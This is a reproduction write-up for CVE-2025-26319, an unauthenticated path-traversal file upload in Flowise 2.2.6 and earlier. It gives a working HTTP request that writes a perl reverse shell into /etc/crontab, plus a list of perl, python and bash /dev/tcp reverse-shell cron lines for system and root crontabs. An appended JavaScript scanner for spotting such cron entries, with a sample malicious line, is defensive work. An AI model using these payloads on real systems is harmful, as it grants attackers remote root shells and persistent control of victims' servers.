CVE-2025-26319 Reproduction
Summary: notes from reproducing CVE-2025-26319.
Affected versions
Affected versions: Flowise <= 2.2.6
Official repository: Flowise
Environment setup
The vulnerability is an unauthenticated arbitrary file upload.
Both setups below were done on Ubuntu 22.04. Note that with the Docker setup the reverse shell cannot be reproduced, because of the restrictions of the Docker environment.
Method 1: direct install
apt-get update
# install fnm
apt-get install unzip
curl -o- https://fnm.vercel.app/install | bash
# reload the shell profile so fnm is on PATH, then install nodejs v22.14.0 via fnm
source ~/.bashrc
fnm install 22
fnm use 22
# install flowise
npm install -g flowise@2.2.6
# start flowise
npx flowise start
Method 2: Docker
# install docker-compose
apt install docker-compose
# download the flowise source archive
wget https://codeload.github.com/FlowiseAI/Flowise/zip/refs/tags/flowise%402.2.6
# unpack the flowise archive
unzip /root/temp/flowise@2.2.6
# create the .env file docker-compose needs
cp -r -a /root/temp/Flowise-flowise-2.2.6/docker/.env.example /root/temp/Flowise-flowise-2.2.6/docker/.env
# pin the 2.2.6 docker image:
# change "image: flowiseai/flowise" to "image: flowiseai/flowise:2.2.6"
nano /root/temp/Flowise-flowise-2.2.6/docker/docker-compose.yml
# start the containers
cd /root/temp/Flowise-flowise-2.2.6/docker
docker-compose up -d
PoC
POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2fetc/./ HTTP/1.1
Host: xxxx.xxxx.xxxx.xxxx
Content-Type: multipart/form-data; boundary=----rpomorn7zgs1dw8jhz
Content-Length: 432

------rpomorn7zgs1dw8jhz
Content-Disposition: form-data; name="files";filename="crontab"
Content-type: text/plain

*/1 * * * * root perl -e 'use Socket; $i="192.168.1.188";$p=443; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/bash -i");};'
------rpomorn7zgs1dw8jhz--
This PoC writes a reverse-shell command into /etc/crontab, the system cron table on Linux. Under Docker and on Windows it is hard to turn the file upload into a shell: a Docker container has no cron service, and on Windows you would have to upload an AV-evading payload into C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp and then wait for a user to log in?
Curiously, if the upload path does not exist it is created automatically. For example, with /api/v1/attachments/..%2f..%2f..%2f..%2f..%2fetc/temp, the temp directory is created if it does not already exist.
Reverse shell one-liners for reference
(1) Write to /etc/crontab
Works on both Ubuntu and CentOS.
# Method 1
*/1 * * * * root perl -e 'use Socket; $i="your_server_ip";$p=your_server_port; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/bash -i");};'
# Method 2
*/1 * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your_server_ip",your_server_port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Method 3
*/1 * * * * root bash -c "bash -i >& /dev/tcp/your_server_ip/your_server_port 0>&1"
(2) Write to the root user's crontab
On CentOS, write the reverse shell line to /var/spool/cron/root.
On Ubuntu, write it to /var/spool/cron/crontabs/root.
# Method 1
*/1 * * * * perl -e 'use Socket; $i="your_server_ip";$p=your_server_port; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/bash -i");};'
# Method 2
*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your_server_ip",your_server_port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Method 3
*/1 * * * * bash -c "bash -i >& /dev/tcp/your_server_ip/your_server_port 0>&1"
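Since both persistence locations above are cron tables, the responder's question is how to spot such an entry after the fact. The following added example (not part of the original post) parses /etc/crontab-style and per-user crontab content and flags commands carrying the network-shell indicators seen in the one-liners above. The indicator list, sample lines and the 203.0.113.10 address are constructed for illustration.

```javascript
// Added example, not part of the original post: a small scanner that reads
// crontab content and flags entries whose command carries reverse-shell
// indicators like those in the write-up. Indicator list and sample lines
// are constructed for illustration; extend INDICATORS for your environment.

// Substrings typical of the shell one-liners above.
const INDICATORS = [
  '/dev/tcp/',       // bash network redirection
  'use Socket',      // perl Socket reverse shell
  'socket.socket(',  // python socket reverse shell
  'os.dup2(',        // python: duplicate socket fd onto stdio
  '>&S',             // perl: attach stdio to the socket
];

// Parse one crontab line. system=true means /etc/crontab layout
// (5 schedule fields + user + command); false means per-user layout
// (5 schedule fields + command). "@reboot"-style nicknames count as one
// schedule field. Returns null for blanks, comments and environment
// assignments such as SHELL=/bin/sh.
function parseCronLine(line, system) {
  const text = line.trim();
  if (text === '' || text.startsWith('#')) return null;
  if (/^[A-Za-z_][A-Za-z0-9_]*=/.test(text)) return null;
  const fields = text.split(/\s+/);
  const schedFields = fields[0].startsWith('@') ? 1 : 5;
  const n = schedFields + (system ? 1 : 0);
  if (fields.length <= n) return null;
  return {
    schedule: fields.slice(0, schedFields).join(' '),
    user: system ? fields[schedFields] : null,
    command: fields.slice(n).join(' '),
  };
}

// Scan a whole crontab; returns one finding per suspicious entry.
function scanCrontab(content, system) {
  const findings = [];
  content.split('\n').forEach((line, idx) => {
    const entry = parseCronLine(line, system);
    if (!entry) return;
    const hits = INDICATORS.filter((ind) => entry.command.includes(ind));
    if (hits.length === 0) return;
    // An every-minute schedule paired with a network indicator is exactly
    // the shape of the payloads above; rank it higher.
    const everyMinute = /^(\*|\*\/1) /.test(entry.schedule);
    findings.push({
      line: idx + 1,
      user: entry.user,
      schedule: entry.schedule,
      indicators: hits,
      severity: everyMinute ? 'high' : 'medium',
    });
  });
  return findings;
}

// Constructed sample in /etc/crontab layout: two benign entries and one
// that matches the bash /dev/tcp pattern. 203.0.113.10 is a documentation
// address, not a real host.
const SAMPLE_SYSTEM_CRONTAB = [
  'SHELL=/bin/sh',
  '# m h dom mon dow user command',
  '17 * * * * root cd / && run-parts --report /etc/cron.hourly',
  '0 3 * * * root /usr/bin/apt-get update',
  '*/1 * * * * root bash -c "bash -i >& /dev/tcp/203.0.113.10/443 0>&1"',
].join('\n');

// Stand-alone run: in practice read /etc/crontab with system=true and the
// files under /var/spool/cron (CentOS) or /var/spool/cron/crontabs
// (Ubuntu) with system=false.
console.log(JSON.stringify(scanCrontab(SAMPLE_SYSTEM_CRONTAB, true), null, 2));
```

A substring list is deliberately crude: it is cheap to run from a host-inspection script or an EDR custom rule, and an entry scheduled every minute that touches the network is rare enough in legitimate cron tables that the false-positive rate is low. Pair it with file-integrity monitoring on the two crontab paths, since the upload itself leaves a mtime change before the first minute elapses.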
This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.